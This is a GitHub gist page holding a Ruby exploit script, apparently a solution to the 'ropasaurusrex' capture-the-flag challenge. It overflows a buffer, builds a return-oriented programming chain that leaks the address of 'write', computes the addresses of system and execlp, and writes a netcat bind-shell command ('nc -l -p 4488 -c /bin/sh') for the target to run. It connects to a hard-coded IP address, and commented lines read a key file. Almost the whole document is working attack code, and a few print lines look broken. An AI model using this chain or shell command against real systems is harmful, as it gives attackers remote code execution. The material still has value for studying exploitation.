Created
April 22, 2013 16:45
-
-
Save iagox86/5436600 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/ruby | |
require 'socket' | |
read = 0x0804832C | |
write = 0x0804830C | |
ptr_write = 0x08049614 | |
pppr = 0x80484e4 | |
writable_data_section = 0x08049620 | |
bytes_to_write = "nc -l -p 4488 -c /bin/sh\x00" | |
#bytes_to_write = "cat /home/ropasaurusrex/key\x00" | |
offset_execlp = 0x263a0 # offset from 'write' | |
offset_system = 0x85d40 | |
i = 0x08049614 | |
addr = write | |
params = [ | |
# Read the 4-byte address of 'write' so we can calculate execlp | |
pppr, # return address (pop pop pop ret) | |
1, # handle (stdout) | |
ptr_write, # buf | |
0x00000004, # length | |
# Return address for the pppr | |
read, | |
# Write "bytes_to_write" to "writable_data_section" (ie, write the command that will be passed to execlp) | |
pppr, # return address (pop pop pop ret) | |
0, # handle (stdin) | |
writable_data_section, # buffer | |
bytes_to_write.length, # length | |
# Return address for the pppr | |
write, | |
# Write "WIN" to the console to make sure things are working | |
pppr, # return address | |
1, # handle (stdout) | |
0x08048510, # buf | |
4, # length | |
# Return address for the pppr | |
read, | |
# Write the 4-byte address of execlp to writable memory (the address of 'read' right now) | |
pppr, # return address | |
0, # handle (stdin) | |
0x0804961c, # buffer (address of 'read') | |
4, | |
read, | |
0x48484848, | |
writable_data_section, | |
writable_data_section, | |
0 | |
] | |
sploit = '' | |
sploit += ("A" * 140) | |
sploit += [addr].pack("L") | |
sploit += params.pack("L*") | |
#s = TCPSocket.new("localhost", 1025) | |
s = TCPSocket.new("54.234.151.114", 1025) | |
s.write(sploit) | |
write_address = s.read(4).unpack("L").pop | |
execlp_address = write_address - offset_execlp | |
system_address = write_address - offset_system | |
puts("execlp address: x" execlp_address) | |
puts("system address: x" system_address) | |
s.write(bytes_to_write) # write our data to a known address | |
s.write([system_address].pack("L")) # The function to call | |
puts(s.read(3)) | |
#s.write("pwd") | |
puts(s.read()) | |
#system("nc 54.234.151.114 1025 < file") | |
#system("./ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d < file") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment